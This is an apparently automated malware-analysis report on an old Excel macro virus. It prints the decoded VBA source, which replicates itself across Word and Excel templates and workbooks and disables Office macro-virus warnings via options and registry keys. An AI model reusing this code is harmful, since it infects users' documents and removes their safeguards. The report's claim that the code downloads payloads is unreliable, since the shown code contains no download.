Xls.Trojan.Slacker-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 b3986e912d0f7664…

MALICIOUS

Office (OLE)

24.0 KB Created: 2001-09-21 07:15:11 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: bfb9c6859eeb49319a50f6ed60c7dc47 SHA-1: 67186a89533eb4833994857d41bd6a02d93f18fd SHA-256: b3986e912d0f7664fbdae4d48d44a83d700a91cffb19bd042500acd4f0c6710a
220 Risk Score

Malware Insights

Xls.Trojan.Slacker-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Slacker-2, and also detected as Doc.Trojan.Hopper-10 on an extracted artifact. The VBA macros contain CreateObject and GetObject calls, indicating an attempt to execute code. The macro code appears to be designed to copy itself to other templates and potentially download or execute additional payloads, as suggested by the use of 'GetObject' and 'CreateObject' for 'Excel.Application'.

Heuristics 4

  • ClamAV: Xls.Trojan.Slacker-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Slacker-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4806 bytes
SHA-256: c8fbda9c89fbd7d6324194367bf8a1ca1cb577782b4987b626f9e205cec4d9f5
Detection
ClamAV: Doc.Trojan.Hopper-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--BEAT-->
'2000-4
Private Sub Document_Close()
    On Error Resume Next
    OfficeVirusProtection
''  DoWordtoItself
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
    Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If ad.Lines(1, 1) <> "'<!--BEAT-->" Then
        ad.DeleteLines 1, ad.CountofLines
        ad.InsertLines 1, TT.Lines(1, TT.CountofLines)
        If ad.Lines(1, 1) <> "'<!--BEAT-->" Then
            ad.InsertLines 1, nt.Lines(1, nt.CountofLines)
        End If
    End If
    If nt.Lines(1, 1) <> "'<!--BEAT-->" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, ad.Lines(1, ad.CountofLines)
     End If
        '-------------------
    If TT.Lines(1, 1) <> "'<!--BEAT-->" Then
        TT.DeleteLines 1, TT.CountofLines
        TT.InsertLines 1, nt.Lines(1, nt.CountofLines)
    End If
''    DoWordtoExcel
    Set xlApp = GetObject(, "Excel.Application")
     If xlApp = "" Then
    Set xlApp = CreateObject("Excel.Application")
        WQuit = True
    End If
    '-----------
    If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) = UCase("BOOK1") Then ''转成大写的字符串
            Kill xlApp.Application.StartupPath + "\Book1."
    End If
    '------------
    Set Book1Obj = xlApp.Workbooks.Add
        Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines)
        Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
        Book1Obj.Close
        xlApp.Quit
'   ------------------
End Sub

Private Sub Workbook_Deactivate()
    On Error Resume Next
    OfficeVirusProtection
    Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
    Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        If AW.Lines(1, 1) <> "'<!--BEAT-->" Then
        AW.DeleteLines 1, AW.CountofLines
        AW.InsertLines 1, TW.Lines(1, TW.CountofLines)
    End If
        If TW.Lines(1, 1) <> "'<!--BEAT-->" Then
        TW.DeleteLines 1, TW.CountofLines
        TW.InsertLines 1, AW.Lines(1, TW.CountofLines)
    End If
    '--------------
    Set WordObj = GetObject(, "Word.Application")
     If WordObj = "" Then
    Set WordObj = CreateObject("Word.Application")
        WQuit = True
    End If
    Set nt = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
     If nt.Lines(1, 1) <> "'<!--BEAT-->" Then
        nt.DeleteLines 1, nt.CountofLines
        nt.InsertLines 1, TW.Lines(1, TW.CountofLines)
     End If
    Set nt = Nothing
    If WQuit = True Then WordObj.Quit
End Sub

Private Sub OfficeVirusProtection()
    On Error Resume Next
'''word'VirusProtection
    Set WordObj = GetObject(, "Word.Application")
    If WordObj = "" Then
    Set WordObj = CreateObject("Word.Application")
    WQuit = True
    End If
    Set WdappOp = WordObj.Options
    With WdappOp
        .VirusProtection = False
        .ConfirmConversions = False
        .SaveNormalPrompt = False
    End With
    '''excel'VirusProtection
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Check"
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "0" '= ""
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "0" ' = "Whoa"
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribut
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.